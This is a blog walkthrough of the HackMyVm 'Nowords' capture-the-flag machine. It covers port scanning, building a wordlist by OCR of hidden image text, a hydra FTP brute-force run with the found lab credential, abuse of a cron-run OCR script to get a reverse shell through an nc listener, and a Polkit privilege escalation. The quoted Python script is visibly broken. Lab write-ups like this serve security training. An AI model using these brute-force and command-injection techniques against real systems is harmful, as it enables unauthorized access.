HackMyVm Nowords Walkthrough (Ubuntu Polkit)

HackMyVm Nowords Walkthrough


Below is main steps.

Nmap scan ports, scan port 80,  found hints at index.html.

 ~ curl         
 Hint inside.
 <!-- [usernames and passwords are lowercase] -->

Download robots.txt, it's actually an PNG file, with some strings in it.

OCR the strings online, make a dic, and scan port 80 again, found only 1 valid files. Download it, and it's actually a JPG file with some strings.

OCR again, lower the first char of each word, make a dic. Then brute force ftp.

 ~ hydra -L pass2.txt -P pass2.txt -t 64 ftp -f                                                                                                                                   fish-0 | 0 [12:54:58]
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 12:55:22
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 64 tasks per 1 server, overall 64 tasks, 5776 login tries (l:76/p:76), ~91 tries per task
 [DATA] attacking
 [21][ftp] host:   login: sophie   password: natalia
 [STATUS] attack finished for (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 12:56:28

Through the ftp, we can browse the whole machine. In /home/sophie, found command.jpg and log.txt.

In /home/me, found doit.py.

 ~ cat doit.py                                                                        fish-0 | 0 [13:50:38]
 # coding: utf-8
 import pytesseract
 import os
     import Image, ImageOps, ImageEnhance, imread
 except ImportError:
     from PIL import Image, ImageOps, ImageEnhance
 def solve_captcha(path):
     captcha = pytesseract.image_to_string(Image.open(path))
     return captcha
 if __name__ == '__main__':
     text = solve_captcha("/home/sophie/command.jpg")
     a = text.split("\n")
     f = open("/home/sophie/log.txt","w")
     f.write(" Executing: "+text)

The script means, we need to put and bash command in command.jpg, then cron job will do OCR and run the command.

We put shell code in command.jpg, then upload through ftp.

Wait a minute, we will get reverse shell.

 ~ nc -nlvp 1234                                                                                                                                                                                 fish-0 | 0 [13:09:25]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 bash: cannot set terminal process group (136083): Inappropriate ioctl for device
 bash: no job control in this shell

The root step is use the Ubuntu Polkit Vulnerability.

Check the POC here.




«    2022年12月    »
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2